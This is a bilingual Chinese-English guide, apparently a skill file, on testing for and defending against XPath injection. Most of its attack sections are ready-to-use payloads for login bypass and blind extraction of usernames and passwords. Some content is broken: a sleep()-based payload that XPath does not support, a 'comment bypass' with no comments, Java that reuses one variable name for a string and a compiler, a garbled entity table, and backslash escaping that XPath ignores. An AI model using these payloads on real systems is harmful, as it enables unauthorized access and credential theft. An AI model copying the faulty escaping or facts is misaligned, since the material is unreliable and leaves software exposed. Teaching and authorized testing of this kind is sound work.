xpath-injection-testing
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseXPath注入漏洞测试
XPath Injection Vulnerability Testing
概述
Overview
XPath注入是一种类似于SQL注入的漏洞,利用XPath查询语句的构造缺陷,可能导致信息泄露、认证绕过等。本技能提供XPath注入的检测、利用和防护方法。
XPath injection is a vulnerability similar to SQL injection that exploits flaws in the construction of XPath query statements, potentially leading to information disclosure, authentication bypass, etc. This skill provides methods for detecting, exploiting, and defending against XPath injection.
漏洞原理
Vulnerability Principle
应用程序将用户输入直接拼接到XPath查询语句中,未进行充分验证和过滤,导致攻击者可以修改查询逻辑。
危险代码示例:
java
String xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);Applications directly concatenate user input into XPath query statements without sufficient validation and filtering, allowing attackers to modify query logic.
Dangerous Code Example:
java
String xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);XPath基础
XPath Basics
查询语法
Query Syntax
基础查询:
//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']Basic Queries:
//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']函数
Functions
常用函数:
- - 获取文本内容
text() - - 计数
count() - - 子字符串
substring() - - 字符串长度
string-length() - - 包含检查
contains()
Common Functions:
- - Retrieve text content
text() - - Count elements
count() - - Extract substring
substring() - - Get string length
string-length() - - Check content inclusion
contains()
测试方法
Testing Methods
1. 识别XPath输入点
1. Identify XPath Input Points
常见功能:
- 用户登录
- 数据搜索
- XML数据查询
- 配置查询
Common Features:
- User login
- Data search
- XML data query
- Configuration query
2. 基础检测
2. Basic Detection
测试特殊字符:
' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1测试逻辑操作符:
' or '1'='1
' and '1'='2
' or 1=1 or 'Test Special Characters:
' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1Test Logical Operators:
' or '1'='1
' and '1'='2
' or 1=1 or '3. 认证绕过
3. Authentication Bypass
基础绕过:
用户名: admin' or '1'='1
密码: anything
查询: //user[username='admin' or '1'='1' and password='anything']更精确的绕过:
用户名: admin') or ('1'='1
查询: //user[username='admin') or ('1'='1' and password='*']Basic Bypass:
Username: admin' or '1'='1
Password: anything
Query: //user[username='admin' or '1'='1' and password='anything']More Precise Bypass:
Username: admin') or ('1'='1
Query: //user[username='admin') or ('1'='1' and password='*']4. 信息泄露
4. Information Disclosure
枚举用户:
' or 1=1 or '
' or '1'='1
') or 1=1 or ('获取节点数量:
' or count(//user)>0 or '获取特定节点:
' or substring(//user[1]/username,1,1)='a' or 'Enumerate Users:
' or 1=1 or '
' or '1'='1
') or 1=1 or ('Get Node Count:
' or count(//user)>0 or 'Get Specific Node:
' or substring(//user[1]/username,1,1)='a' or '利用技术
Exploitation Techniques
认证绕过
Authentication Bypass
方法1:逻辑绕过
输入: admin' or '1'='1
查询: //user[username='admin' or '1'='1' and password='*']
结果: 匹配所有用户方法2:注释绕过
输入: admin')] | //* | //*[('
查询: //user[username='admin')] | //* | //*[('' and password='*']方法3:布尔盲注
' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or 'Method 1: Logical Bypass
Input: admin' or '1'='1
Query: //user[username='admin' or '1'='1' and password='*']
Result: Matches all usersMethod 2: Comment Bypass
Input: admin')] | //* | //*[('
Query: //user[username='admin')] | //* | //*[('' and password='*']Method 3: Boolean Blind Injection
' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or '信息泄露
Information Disclosure
枚举所有用户:
' or 1=1 or '
结果: 返回所有用户节点获取用户名:
' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
逐步获取每个字符获取密码:
' or substring(//user[1]/password,1,1)='p' or '
逐步获取密码字符Enumerate All Users:
' or 1=1 or '
Result: Returns all user nodesRetrieve Username:
' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
Retrieve each character step by stepRetrieve Password:
' or substring(//user[1]/password,1,1)='p' or '
Retrieve password characters step by step盲注技术
Blind Injection Techniques
基于时间的盲注:
' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '基于布尔值的盲注:
' or substring(//user[1]/username,1,1)='a' or '
观察响应差异Time-Based Blind Injection:
' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or 'Boolean-Based Blind Injection:
' or substring(//user[1]/username,1,1)='a' or '
Observe response differences绕过技术
Bypass Techniques
编码绕过
Encoding Bypass
URL编码:
' or '1'='1 → %27%20or%20%271%27%3D%271HTML实体编码:
' → '
" → "
< → <
> → >URL Encoding:
' or '1'='1 → %27%20or%20%271%27%3D%271HTML Entity Encoding:
' → '
" → "
< → <
> → >注释绕过
Comment Bypass
使用注释:
' or 1=1 or '
' or '1'='1' or 'Using Comments:
' or 1=1 or '
' or '1'='1' or '函数绕过
Function Bypass
使用不同函数:
substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]Using Different Functions:
substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]工具使用
Tool Usage
XPath表达式测试
XPath Expression Testing
在线工具:
- XPath Tester
- XMLSpy
- Oxygen XML Editor
Online Tools:
- XPath Tester
- XMLSpy
- Oxygen XML Editor
Burp Suite
Burp Suite
- 拦截XPath查询请求
- 修改查询参数
- 观察响应结果
- Intercept XPath query requests
- Modify query parameters
- Observe response results
Python脚本
Python Script
python
from lxml import etree
from lxml.etree import XPathpython
from lxml import etree
from lxml.etree import XPath加载XML文档
Load XML document
doc = etree.parse('users.xml')
doc = etree.parse('users.xml')
测试注入
Test injection
xpath_expr = "//user[username='admin' or '1'='1']"
xpath = XPath(xpath_expr)
results = xpath(doc)
print(results)
undefinedxpath_expr = "//user[username='admin' or '1'='1']"
xpath = XPath(xpath_expr)
results = xpath(doc)
print(results)
undefined验证和报告
Verification and Reporting
验证步骤
Verification Steps
- 确认可以控制XPath查询
- 验证认证绕过或信息泄露
- 评估影响(未授权访问、数据泄露等)
- 记录完整的POC
- Confirm control over XPath queries
- Verify authentication bypass or information disclosure
- Assess impact (unauthorized access, data leakage, etc.)
- Record complete POC
报告要点
Report Key Points
- 漏洞位置和输入参数
- XPath查询构造方式
- 完整的利用步骤和PoC
- 修复建议(输入验证、参数化查询等)
- Vulnerability location and input parameters
- XPath query construction method
- Complete exploitation steps and PoC
- Remediation recommendations (input validation, parameterized queries, etc.)
防护措施
Protection Measures
推荐方案
Recommended Solutions
-
输入验证java
private static final String[] XPATH_ESCAPE_CHARS = {"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "}; public static String escapeXPath(String input) { if (input == null) { return null; } StringBuilder sb = new StringBuilder(); for (int i = 0; i < input.length(); i++) { char c = input.charAt(i); if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) { sb.append("\\"); } sb.append(c); } return sb.toString(); } -
参数化查询java
// 使用XPath变量 String xpath = "//user[username=$username and password=$password]"; XPathExpression expr = xpath.compile(xpath); XPathVariableResolver resolver = new MapVariableResolver( Map.of("username", escapedUsername, "password", escapedPassword)); expr.setXPathVariableResolver(resolver); -
白名单验证java
// 只允许特定字符 if (!input.matches("^[a-zA-Z0-9@._-]+$")) { throw new IllegalArgumentException("Invalid input"); } -
使用预编译查询java
// 预定义查询模板 private static final String LOGIN_QUERY = "//user[username=$1 and password=$2]"; // 使用参数绑定 -
最小权限
- 限制XPath查询范围
- 使用访问控制
- 限制可查询的节点
-
Input Validationjava
private static final String[] XPATH_ESCAPE_CHARS = {"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "}; public static String escapeXPath(String input) { if (input == null) { return null; } StringBuilder sb = new StringBuilder(); for (int i = 0; i < input.length(); i++) { char c = input.charAt(i); if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) { sb.append("\\"); } sb.append(c); } return sb.toString(); } -
Parameterized Queriesjava
// Use XPath variables String xpath = "//user[username=$username and password=$password]"; XPathExpression expr = xpath.compile(xpath); XPathVariableResolver resolver = new MapVariableResolver( Map.of("username", escapedUsername, "password", escapedPassword)); expr.setXPathVariableResolver(resolver); -
Whitelist Validationjava
// Only allow specific characters if (!input.matches("^[a-zA-Z0-9@._-]+$")) { throw new IllegalArgumentException("Invalid input"); } -
Use Precompiled Queriesjava
// Predefined query template private static final String LOGIN_QUERY = "//user[username=$1 and password=$2]"; // Use parameter binding -
Least Privilege
- Restrict XPath query scope
- Use access control
- Limit queryable nodes
注意事项
Notes
- 仅在授权测试环境中进行
- 注意不同XPath版本的语法差异
- 测试时避免对XML数据造成影响
- 了解目标应用的XPath实现
- Only perform in authorized testing environments
- Note syntax differences between different XPath versions
- Avoid impacting XML data during testing
- Understand the target application's XPath implementation